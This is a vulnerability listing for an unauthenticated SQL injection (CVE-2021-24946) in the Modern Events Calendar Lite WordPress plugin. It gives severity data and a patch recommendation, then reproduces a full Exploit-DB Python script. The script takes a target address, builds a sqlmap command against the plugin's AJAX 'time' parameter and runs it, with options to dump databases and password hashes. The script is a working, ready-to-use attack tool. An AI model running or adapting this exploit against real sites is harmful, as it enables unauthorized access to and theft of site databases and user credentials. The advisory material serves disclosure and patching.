WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)

vendor:

Modern Events Calendar Lite

by:

Ron Jost (Hacker5preme)

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Modern Events Calendar Lite

Affected Version From: <= 6.1

Affected Version To: 6.1.2005

Patch Exists: YES

Related CWE: CVE-2021-24946

CPE: a:modern_events_calendar:modern_events_calendar_lite

Metasploit:

Other Scripts:

Tags: cve2021,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,cve,modern-events-calendar-lite,wordpress

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445, https://wordpress.org/plugins/modern-events-calendar-lite/, https://nvd.nist.gov/vuln/detail/CVE-2021-24946, http://packetstormsecurity.com/files/165742/WordPress-Modern-Events-Calendar-6.1-SQL-Injection.html

Nuclei Metadata: {'max-request': 1, 'verified': True, 'framework': 'wordpress', 'vendor': 'webnus', 'product': 'modern_events_calendar_lite'}

Platforms Tested: Ubuntu 20.04

2022

WordPress Plugin Modern Events Calendar V 6.1 – SQL Injection (Unauthenticated)

The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue.

Mitigation:

The vendor has released version 6.1.5 which addresses the SQL injection vulnerability. Users are advised to update to the latest version.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
# Date 26.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip
# Version: <= 6.1
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24946
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md

'''
Description:
The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter
before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users,
leading to an unauthenticated SQL injection issue
'''

#Banner:
banner = '''

 .oOOOo.  o      'O o.OOoOoo                                                                                   
.O     o  O       o  O                 .oOOo. .oOOo. .oOOo.  oO             .oOOo. o   O  .oOOo. o   O  .oOOo. 
o         o       O  o                      O O    o      O   O                  O O   o  O    o O   o  O      
o         o       o  ooOO                   o o    O      o   o                  o o   o  o    O o   o  o      
o         O      O'  O       ooooooooo     O' o    o     O'   O   ooooooooo     O' OooOOo `OooOo OooOOo OoOOo. 
O         `o    o    o                    O   O    O    O     o                O       O       O     O  O    O 
`o     .o  `o  O     O                  .O    o    O  .O      O              .O        o       o     o  O    o 
 `OoooO'    `o'     ooOooOoO           oOoOoO `OooO' oOoOoO OooOO           oOoOoO     O  `OooO'     O  `OooO' 
                                                                                                               
                                                        [+] Modern Events Calendar Lite SQL-Injection
                                                        [@] Developed by Ron Jost (Hacker5preme)

'''

print(banner)

import requests
import argparse
from datetime import datetime
import os

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH


# Exploit:
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '
exploitcode_risk = ' -p time'
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url +  retrieve_mode + exploitcode_risk
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))